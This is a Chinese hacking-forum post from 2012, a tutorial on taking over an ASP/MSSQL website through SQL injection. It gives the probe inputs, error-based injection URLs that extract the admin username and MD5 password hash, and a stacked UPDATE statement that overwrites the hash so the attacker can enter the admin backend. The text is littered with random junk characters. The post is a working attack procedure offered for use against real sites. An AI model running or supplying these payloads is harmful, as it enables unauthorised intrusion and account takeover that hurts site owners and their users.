经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。, q$ f: q5 h9 b% O$ X
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
6 t6 K: d7 ?. S" b1 L- o: c测试如下:; }- e) x# p1 O/ ?( K
http://www.tmdsb.com/news.asp?id=121: [# x) h/ d4 N. U4 B9 y
在地址后输入单引号,显示% X1 U5 [9 C; k# R4 d0 v
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’/ Q4 f1 A1 ?: F8 G P0 p7 Z
字符串 ’’’ 之前有未闭合的引号
. X& e6 V y ?9 \# q( b5 }/news/tmdws.asp,行63$ f7 ~0 W; F; g8 ~0 T
说明没有过滤单引号且数据库是MSSQL.
% a. N8 q! a" Z! Q9 G( _8 b6 O, pand 1=1正常。and 1=2出错。肯定存在注入; _9 S8 `! [7 x, H3 g
接着输入
# n8 J6 I5 K1 i. n0 y- jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
z2 H$ W2 p7 U8 w, N得到帐号为:admin
# M O3 N6 o+ ^/ I* a& Uhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)+ G9 W: g# E5 S" {' _
得到密码为:a4716077c2ba075c
' V/ Y2 }$ D. p接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
# v' r6 T, Y# }4 e B- R( K. Q命令如下 :
- l# \+ L6 ]+ L. Y) Y4 q! w;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
- J3 a/ z" Z% ?/ j$ G8 B7 X这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41